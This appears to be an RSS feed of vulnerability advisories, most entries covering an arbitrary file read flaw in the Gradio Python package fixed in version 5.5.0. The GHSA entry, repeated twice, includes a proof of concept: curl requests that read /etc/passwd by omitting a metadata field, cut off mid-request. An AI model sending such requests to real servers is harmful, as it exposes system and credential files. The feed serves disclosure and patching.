<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Wed, 07 Oct 2026 19:08:37 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-199803</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-199803</link>
      <description>EUVD-2026-199803</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-199803</guid>
    </item>
    <item>
      <title>fkie_cve-2024-51751</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2024-51751</link>
      <description>&lt;p&gt;Gradio is an open-source Python package designed to enable quick builds of a demo or web application. If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server. This issue has been addressed in release version 5.5.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Gradio is an open-source Python package designed to enable quick builds of a demo or web application. If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server. This issue has been addressed in release version 5.5.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2024-51751</guid>
    </item>
    <item>
      <title>GHSA-rhm9-gp5p-5248 — Gradio vulnerable to arbitrary file read with File and UploadButton components</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-rhm9-gp5p-5248</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: gradio&lt;/p&gt;
&lt;p&gt;### Summary
If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server.&lt;/p&gt;
&lt;p&gt;### Details
Consider the following application where a user can upload a file and preview its content:
```
import gradio as gr&lt;/p&gt;
&lt;p&gt;def greet(value: bytes):
    return str(value)&lt;/p&gt;
&lt;p&gt;demo = gr.Interface(fn=greet, inputs=gr.File(type=&amp;#34;binary&amp;#34;), outputs=&amp;#34;textbox&amp;#34;)&lt;/p&gt;
&lt;p&gt;if __name__ == &amp;#34;__main__&amp;#34;:
    demo.launch()
```&lt;/p&gt;
&lt;p&gt;If we run this application and make the following request (which attempts to read the `/etc/passwd` file)
```
curl &amp;#39;http://127.0.0.1:7860/gradio_api/run/predict&amp;#39; -H &amp;#39;content-type: application/json&amp;#39; --data-raw &amp;#39;{&amp;#34;data&amp;#34;:[{&amp;#34;path&amp;#34;:&amp;#34;/etc/passwd&amp;#34;,&amp;#34;orig_name&amp;#34;:&amp;#34;test.txt&amp;#34;,&amp;#34;size&amp;#34;:4,&amp;#34;mime_type&amp;#34;:&amp;#34;text/plain&amp;#34;,&amp;#34;meta&amp;#34;:{&amp;#34;_type&amp;#34;:&amp;#34;gradio.FileData&amp;#34;}}],&amp;#34;event_data&amp;#34;:null,&amp;#34;fn_index&amp;#34;:0,&amp;#34;trigger_id&amp;#34;:8,&amp;#34;session_hash&amp;#34;:&amp;#34;mnv42s5gt7&amp;#34;}&amp;#39;
```&lt;/p&gt;
&lt;p&gt;Then this results in the following error on the server&lt;/p&gt;
&lt;p&gt;```
gradio.exceptions.InvalidPathError: Cannot move /etc/passwd to the gradio cache dir because it was not uploaded by a user.
```&lt;/p&gt;
&lt;p&gt;This is expected. However, if we now remove the `&amp;#34;meta&amp;#34;:{&amp;#34;_type&amp;#34;:&amp;#34;gradio.FileData&amp;#34;}` from the request:
```
curl &amp;#39;http://127.0.0.1:7860/gradio_api/run/predict&amp;#39; -H &amp;#39;content-type: application/json&amp;#39; --data-raw &amp;#39;{&amp;#34;data&amp;#34;:[{&amp;#34;path&amp;#34;:&amp;#34;/etc/passwd&amp;#34;,&amp;#34;orig_name&amp;#34;:&amp;#34;test.txt&amp;#34;,&amp;#34;size&amp;#34;:4,&amp;#34;mime_type&amp;#34;:&amp;#34;text/plain&amp;#34;}],&amp;#34;event_data&amp;#34;:null,&amp;#34;fn_index&amp;#34;:0,&amp;#34;trigger_id&amp;#34;:8,&amp;#34;sess…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: gradio&lt;/p&gt;
&lt;p&gt;### Summary
If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server.&lt;/p&gt;
&lt;p&gt;### Details
Consider the following application where a user can upload a file and preview its content:
```
import gradio as gr&lt;/p&gt;
&lt;p&gt;def greet(value: bytes):
    return str(value)&lt;/p&gt;
&lt;p&gt;demo = gr.Interface(fn=greet, inputs=gr.File(type=&amp;#34;binary&amp;#34;), outputs=&amp;#34;textbox&amp;#34;)&lt;/p&gt;
&lt;p&gt;if __name__ == &amp;#34;__main__&amp;#34;:
    demo.launch()
```&lt;/p&gt;
&lt;p&gt;If we run this application and make the following request (which attempts to read the `/etc/passwd` file)
```
curl &amp;#39;http://127.0.0.1:7860/gradio_api/run/predict&amp;#39; -H &amp;#39;content-type: application/json&amp;#39; --data-raw &amp;#39;{&amp;#34;data&amp;#34;:[{&amp;#34;path&amp;#34;:&amp;#34;/etc/passwd&amp;#34;,&amp;#34;orig_name&amp;#34;:&amp;#34;test.txt&amp;#34;,&amp;#34;size&amp;#34;:4,&amp;#34;mime_type&amp;#34;:&amp;#34;text/plain&amp;#34;,&amp;#34;meta&amp;#34;:{&amp;#34;_type&amp;#34;:&amp;#34;gradio.FileData&amp;#34;}}],&amp;#34;event_data&amp;#34;:null,&amp;#34;fn_index&amp;#34;:0,&amp;#34;trigger_id&amp;#34;:8,&amp;#34;session_hash&amp;#34;:&amp;#34;mnv42s5gt7&amp;#34;}&amp;#39;
```&lt;/p&gt;
&lt;p&gt;Then this results in the following error on the server&lt;/p&gt;
&lt;p&gt;```
gradio.exceptions.InvalidPathError: Cannot move /etc/passwd to the gradio cache dir because it was not uploaded by a user.
```&lt;/p&gt;
&lt;p&gt;This is expected. However, if we now remove the `&amp;#34;meta&amp;#34;:{&amp;#34;_type&amp;#34;:&amp;#34;gradio.FileData&amp;#34;}` from the request:
```
curl &amp;#39;http://127.0.0.1:7860/gradio_api/run/predict&amp;#39; -H &amp;#39;content-type: application/json&amp;#39; --data-raw &amp;#39;{&amp;#34;data&amp;#34;:[{&amp;#34;path&amp;#34;:&amp;#34;/etc/passwd&amp;#34;,&amp;#34;orig_name&amp;#34;:&amp;#34;test.txt&amp;#34;,&amp;#34;size&amp;#34;:4,&amp;#34;mime_type&amp;#34;:&amp;#34;text/plain&amp;#34;}],&amp;#34;event_data&amp;#34;:null,&amp;#34;fn_index&amp;#34;:0,&amp;#34;trigger_id&amp;#34;:8,&amp;#34;sess…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-rhm9-gp5p-5248</guid>
    </item>
    <item>
      <title>PYSEC-2024-275</title>
      <link>https://cve.radiocsirt.org/vuln/pysec-2024-275</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: gradio&lt;/p&gt;
&lt;p&gt;Gradio is an open-source Python package designed to enable quick builds of a demo or web application. If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server. This issue has been addressed in release version 5.5.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: gradio&lt;/p&gt;
&lt;p&gt;Gradio is an open-source Python package designed to enable quick builds of a demo or web application. If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server. This issue has been addressed in release version 5.5.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/pysec-2024-275</guid>
    </item>
  </channel>
</rss>
